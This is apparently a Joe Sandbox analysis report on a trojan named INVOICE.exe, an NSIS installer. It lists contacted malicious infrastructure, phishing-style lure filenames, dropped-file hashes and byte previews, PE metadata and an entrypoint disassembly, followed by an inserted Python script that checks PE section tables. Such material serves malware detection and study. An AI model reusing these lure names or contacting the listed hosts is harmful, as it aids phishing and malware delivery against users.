http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false |  | high
http://www.tiro.com | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false |  | high
http://nsis.sf.net/NSIS_ErrorError | INVOICE.exe | false |  | high
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false |  | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false |  | high
http://nsis.sf.net/NSIS_Error | INVOICE.exe | false |  | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false |  | high
http://www.fonts.com | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false |  | high
http://www.sandoll.co.kr | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000003.00000000.219054148.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                            Contacted IPs


                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.29.70 | www.cpf3life.com | United States | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | phonetomouth.com | United States | 15169 | GOOGLEUS | false

                                            General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433143
Start date: 11.06.2021
Start time: 11:36:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 51s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: INVOICE.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/4@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 30.8% (good quality ratio 28.9%)
• Quality average: 78.1%
• Quality standard deviation: 28%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.147.198.201, 104.43.193.48, 20.50.102.62, 184.30.24.56, 93.184.221.240, 20.54.104.15, 172.67.162.8, 104.21.42.126, 20.54.26.129, 20.54.7.98, 92.122.213.247, 92.122.213.194
                                            • Excluded domains from analysis (whitelisted): fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, www.dollysusmitha.com.cdn.cloudflare.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433143/sample/INVOICE.exe

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASN

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Context
Request Quotation.exe | malicious | 104.21.19.200
8BDBD0yy0q.apk | malicious | 172.67.169.41
Shipment Invoice & Consignment Notification.exe | malicious | 172.67.188.154
8BDBD0yy0q.apk | malicious | 172.67.169.41
w4X8dxtGi6.exe | malicious | 172.67.163.99
St3aq2ELIJ.exe | malicious | 104.21.2.30
KY4cmAI0jU.exe | malicious | 172.67.206.33
w1iSiwLXiV.exe | malicious | 172.67.188.154
TKeRmCuiit.exe | malicious | 172.67.188.154
c71fd2gJus.exe | malicious | 172.67.222.38
BrBsL8sBvm.exe | malicious | 172.67.188.69
New Order PO2193570O1.doc | malicious | 162.159.134.233
Proforma Invoice.exe | malicious | 172.67.188.154
00010200390_0192021.pdf.exe | malicious | 172.67.188.154
Payment Advice.pdf.doc | malicious | 104.21.19.200
Urgent Contract Order GH7856648,pdf.exe | malicious | 172.67.188.154
bL6FwQU4K5.exe | malicious | 172.67.163.99
E1a92ARmPw.exe | malicious | 104.21.62.88
crt9O3URua.exe | malicious | 172.67.38.66
fuoAl0V94I.exe | malicious | 172.67.162.27

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

Match: C:\Users\user\AppData\Local\Temp\nsj9221.tmp\System.dll
Associated Sample Name / URL | Detection
Shipment Invoice & Consignment Notification.exe | malicious
KY4cmAI0jU.exe | malicious
5t2CmTUhKc.exe | malicious
8qdfmqz1PN.exe | malicious
New Order PO2193570O1.doc | malicious
L2.xlsx | malicious
Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | malicious
New Order PO2193570O1.pdf.exe | malicious
2320900000000.exe | malicious
CshpH9OSkc.exe | malicious
5SXTKXCnqS.exe | malicious
i6xFULh8J5.exe | malicious
AWB00028487364 -000487449287.doc | malicious
090049000009000.exe | malicious
dYy3yfSkwY.exe | malicious
PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx | malicious
Purchase Order Price List 061021.xlsx | malicious
Proforma Invoice and Bank swift-REG.PI-0086547654.exe | malicious
UGGJ4NnzFz.exe | malicious
Proforma Invoice and Bank swift-REG.PI-0086547654.exe | malicious

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\jxl61c12gqlj1w2
                                                                                    Process:C:\Users\user\Desktop\INVOICE.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):186368
                                                                                    Entropy (8bit):7.999073326465555
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:zeJR8AqtAiPJCcwSkW24wzwEV/SyhAJdPAanMl535y6iMSy2TZOcoREojDx9Syda:zeX8m2Ccwx9brJSymPbnMl535iyUOpL2
                                                                                    MD5:EABF5B1834E87B0207D0DC3130F37357
                                                                                    SHA1:C0B6A3BD8A5598EBAE0180E03DFA5208BAC7B8CC
                                                                                    SHA-256:58575C8E3AD256B66DC397F4721A0BD6E1BE2A80322B868591835394C53D0595
                                                                                    SHA-512:9D0F02D820ADED3AD52DDEBFBD8CAB10F3A9B45EAAECCDA5872B34439A328ED772B0F9B5878DF312D80326FBF6AB3ACC8E449AF3D9F76523918717EE14E4D402
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: .!..!P.(.....F[.A03.W...?J.N.......F2.L..Pp.&..O%9....yg.a...:D........P.[k...w..g....iK".Q..r..Iw".3U.c.=;....[..w..G...L.(...v....F...5|..F.....A...P...u...B...o..z....1.S.Ll...9.$,Ns.$Fp............<I.I>.F#..K.3X.N_..d.#.._...O../...q.....qy..b..s..u/...*?...".[x..E6..E...T.s.*..x.E../A.{+...!..D.\...U.U.dV.....y8w6.._`G.Tp8.K.9.=.}.L...Gb.8.F.t....4..S.\.....~!*@..y.T..;.[..."`.kp..\........A0U1a4'.=........10..U..(.3...?..Pz....<s.F..pF.....N..Cl.........D/n..W#.(..x...IO.u..8...'e.?Pj.]U..}..C....O.9M...+.%?..rQ"X..33\S.:..).%.'....H.?.......,>.-......<.....w-..".Qt..Q.,...-B..?.j(.}.Wf)>.....'.....2...2e.n....U.t.L...+t...b..dZ..=i&.z4.%.v.#'.1.....R4.,@%.Q...............o !&4.5.F..D[......V....\......B,.77a...s.....:..i+}..."....l...uE..9.L..OI@..y/.....DW7..v."..Tr....nl`./...=.... .y6.(L.W.v...Z....].%.Y..0.'.r.8G......MG..8s{..p....Q}.tR@........x.._]D..'V.$I...^.......v.Q...X.?p...Me..m.0.N.h..G.P...G..#....x...X..C..^Icy.
                                                                                    C:\Users\user\AppData\Local\Temp\nfqccgctc
                                                                                    Process:C:\Users\user\Desktop\INVOICE.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):56625
                                                                                    Entropy (8bit):4.977281164917555
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:vpfNMGP6XAbV3hcW3/NFikDoq6/hWMlGXEWfBJwNAv:vPMGCwbFhhNFnorJWEGyNQ
                                                                                    MD5:BD19C858192D97E9604FACD096F21BAB
                                                                                    SHA1:20BE0E18245A58AFE0CF734670FE56E5FEE8650B
                                                                                    SHA-256:B62F6C39FAFAEEC5573AC373180FEDD001FD05D876035EFB56A6AD49DEACC280
                                                                                    SHA-512:49B5259F56056CC933D091AAC6024C0428AE70328F8A10150D80973F4BAE3862D5C9736EA45BD8E4D72979E7E756D77CA223BEEE11ABAA3056A90171B66F4218
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: U...........L.....M.....N.....O.....P.....Q.....R.....S.../.T.....U.....V.....W.....X.....Y.....Z.../.[...F.\.../.].....^....._.....`.....a...8.b.....c.....d.....e.....f.....g...S.h.....i.....j.....k.....l.....m.....n.....o.....p.....q...+.r...8.s.....t...S.u.....v.....w.....x.....y.....z...+.{.....|.....}.....~...............+.......................+.................S.......................S..... .....'.................K...................................B...........\.....\.....\.......................8...........K.................................................................................................................K.......................K..... .....'.....................................................B...........\.....\.....\.......................8....................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\nsj9220.tmp
                                                                                    Process:C:\Users\user\Desktop\INVOICE.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):279242
                                                                                    Entropy (8bit):7.450736154071571
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:fYeX8m2Ccwx9brJSymPbnMl535iyUOpLmyD2S8dCwbFhjFnMI7ypt:AN9y5AhPe5pjUcd/8dCQhxMI2z
                                                                                    MD5:8FF52CDF1885512EB8681CC3FF94FA64
                                                                                    SHA1:12684292C1E37F8609B321E29F44E2E0C07B0B5E
                                                                                    SHA-256:588996F8F600844C43C8BB51A443B1E6046CB02DFA69CD19D62D63B8F51A5EAC
                                                                                    SHA-512:044614F6ADA0F03CC1DC021F6602DF069F4D7DB6F464AF513ECCA8C50DC224CD7205C1A91E5FDB85AE1CA09B78D94682B9BBDD3A651F0F3CCF8169348567F062
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: ._......,.......................xH.......^......q_..........................................................................................................................................................................................................................................J...................j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Temp\nsj9221.tmp\System.dll
                                                                                    Process:C:\Users\user\Desktop\INVOICE.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.855045165595541
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                    MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                    SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                    SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                    SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                    Malicious:false
                                                                                    Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
• Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious
• Filename: KY4cmAI0jU.exe, Detection: malicious
• Filename: 5t2CmTUhKc.exe, Detection: malicious
• Filename: 8qdfmqz1PN.exe, Detection: malicious
• Filename: New Order PO2193570O1.doc, Detection: malicious
• Filename: L2.xlsx, Detection: malicious
• Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious
• Filename: New Order PO2193570O1.pdf.exe, Detection: malicious
• Filename: 2320900000000.exe, Detection: malicious
• Filename: CshpH9OSkc.exe, Detection: malicious
• Filename: 5SXTKXCnqS.exe, Detection: malicious
• Filename: i6xFULh8J5.exe, Detection: malicious
• Filename: AWB00028487364 -000487449287.doc, Detection: malicious
• Filename: 090049000009000.exe, Detection: malicious
• Filename: dYy3yfSkwY.exe, Detection: malicious
• Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious
• Filename: Purchase Order Price List 061021.xlsx, Detection: malicious
• Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
• Filename: UGGJ4NnzFz.exe, Detection: malicious
• Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.92520264057843
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:INVOICE.exe
                                                                                    File size:246224
                                                                                    MD5:98901aff995d92677cf637b241ae9a9b
                                                                                    SHA1:6dac1968c4a9ae4bf26f7fd38efb721fcf7d05dc
                                                                                    SHA256:fb6e849cd3af7e8b0c8143397e62a595a42abbfbbac81f2cdd0b2cb4d18ea543
                                                                                    SHA512:e969e941f176c67d1be598ac56882048fb2fc401e5a582b9f2314f09738d6b8768522ba5f67d8c80c260f1169ac103b8972084611a23ea9467c513f03ca9d883
                                                                                    SSDEEP:6144:Ds9q5ND7xrAX/6ccjpGYZ/T12D2TLV47VVgLP3CATNTLzcocuk:ySD9rAXCccjN/T1TRXbtcuk
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                    File Icon

                                                                                    Icon Hash:b2a88c96b2ca6a72

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x40323c
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:099c0646ea7282d232219f8807883be0

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    sub esp, 00000180h
                                                                                    push ebx
                                                                                    push ebp
                                                                                    push esi
                                                                                    xor ebx, ebx
                                                                                    push edi
                                                                                    mov dword ptr [esp+18h], ebx
                                                                                    mov dword ptr [esp+10h], 00409130h
                                                                                    xor esi, esi
                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                    call dword ptr [00407030h]
                                                                                    push 00008001h
                                                                                    call dword ptr [004070B4h]
                                                                                    push ebx
                                                                                    call dword ptr [0040727Ch]
                                                                                    push 00000008h
                                                                                    mov dword ptr [00423F58h], eax
                                                                                    call 00007F9E98C9D50Eh
                                                                                    mov dword ptr [00423EA4h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 00000160h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 0041F458h
                                                                                    call dword ptr [00407158h]
                                                                                    push 004091B8h
                                                                                    push 004236A0h
                                                                                    call 00007F9E98C9D1C1h
                                                                                    call dword ptr [004070B0h]
                                                                                    mov edi, 00429000h
                                                                                    push eax
                                                                                    push edi
                                                                                    call 00007F9E98C9D1AFh
                                                                                    push ebx
                                                                                    call dword ptr [0040710Ch]
                                                                                    cmp byte ptr [00429000h], 00000022h
                                                                                    mov dword ptr [00423EA0h], eax
                                                                                    mov eax, edi
                                                                                    jne 00007F9E98C9A90Ch
                                                                                    mov byte ptr [esp+14h], 00000022h
                                                                                    mov eax, 00429001h
                                                                                    push dword ptr [esp+14h]
                                                                                    push eax
                                                                                    call 00007F9E98C9CCA2h
                                                                                    push eax
                                                                                    call dword ptr [0040721Ch]
                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                    jmp 00007F9E98C9A965h
                                                                                    cmp cl, 00000020h
                                                                                    jne 00007F9E98C9A908h
                                                                                    inc eax
                                                                                    cmp byte ptr [eax], 00000020h
                                                                                    je 00007F9E98C9A8FCh
                                                                                    cmp byte ptr [eax], 00000022h
                                                                                    mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x9e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.4453125 | data | 5.18162709925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.51012867721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
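The section table above is readable by hand, but the checks an analyst makes on it are worth automating. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it decodes raw IMAGE_SECTION_HEADER entries and flags what stands out here, namely the .data section whose virtual size (0x1af98) is far larger than its raw size (0x400), i.e. a region filled at runtime, and the empty, writable .ndata BSS section, which together with the VC++ 6.0 stub and the installer-style import list below is the fingerprint of an NSIS installer stub. The header bytes are constructed from the report's own values so the script runs offline; the PointerToRawData values and the 0x400-byte header size are assumptions, and in real use the bytes are read from the file at e_lfanew + 24 + SizeOfOptionalHeader.

```python
"""Added example: parse IMAGE_SECTION_HEADER entries and apply the checks an
analyst makes on a section table. Not part of the Joe Sandbox report."""
import math
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# IMAGE_SECTION_HEADER (40 bytes): Name[8], VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")


def parse_section_headers(blob: bytes, count: int) -> list:
    """Decode `count` consecutive section headers starting at blob[0]."""
    out = []
    for i in range(count):
        (name, vsize, va, rawsize, rawptr, _relocs, _lines,
         _nrelocs, _nlines, chars) = SECTION_HDR.unpack_from(blob, i * SECTION_HDR.size)
        out.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                    "vsize": vsize, "va": va, "rawsize": rawsize,
                    "rawptr": rawptr, "chars": chars})
    return out


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform): the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def assess(sec: dict, entropy: float = None) -> list:
    """Findings an analyst would raise for one section; thresholds are assumptions."""
    findings = []
    c = sec["chars"]
    if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
        findings.append("writable and executable section")
    if sec["rawsize"] and sec["vsize"] > 4 * sec["rawsize"]:
        findings.append("virtual size far exceeds raw size: region filled at runtime")
    if sec["name"] == ".ndata" and c & IMAGE_SCN_CNT_UNINITIALIZED_DATA:
        findings.append(".ndata BSS section: NSIS installer stub")
    if entropy is not None and entropy > 7.2 and c & IMAGE_SCN_CNT_CODE:
        findings.append("near-random code section: packed or encrypted")
    return findings


def build_section_table(rows) -> bytes:
    """Construct header bytes from (name, vsize, va, rawsize, rawptr, chars) tuples."""
    return b"".join(SECTION_HDR.pack(name.encode().ljust(8, b"\0"), vsize, va, rawsize,
                                     rawptr, 0, 0, 0, 0, chars)
                    for name, vsize, va, rawsize, rawptr, chars in rows)


# Constructed from the Sections table of this report. PointerToRawData assumes a
# 0x400-byte header followed by the sections back to back (an assumption).
REPORT_SECTIONS = [
    (".text", 0x5a5a, 0x1000, 0x5c00, 0x400, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", 0x1190, 0x7000, 0x1200, 0x6000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".data", 0x1af98, 0x9000, 0x400, 0x7200, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".ndata", 0x8000, 0x24000, 0x0, 0x0, IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc", 0x9e0, 0x2c000, 0xa00, 0x7600, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
]
REPORT_ENTROPY = {".text": 6.41769823686, ".rdata": 5.18162709925, ".data": 4.70902740305,
                  ".ndata": 0.0, ".rsrc": 4.51012867721}


def analyze(blob: bytes, count: int, entropies: dict = None) -> dict:
    """Map section name -> findings for a raw section table."""
    entropies = entropies or {}
    return {s["name"]: assess(s, entropies.get(s["name"]))
            for s in parse_section_headers(blob, count)}


if __name__ == "__main__":
    for name, findings in analyze(build_section_table(REPORT_SECTIONS), 5, REPORT_ENTROPY).items():
        print(f"{name:8s} {'; '.join(findings) or '-'}")
```

Run stand-alone it prints one line per section; only .data and .ndata get findings for this sample, and the entropy check stays quiet because 6.4 bits per byte for .text is ordinary compiled code, not a packed blob.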

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2c710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
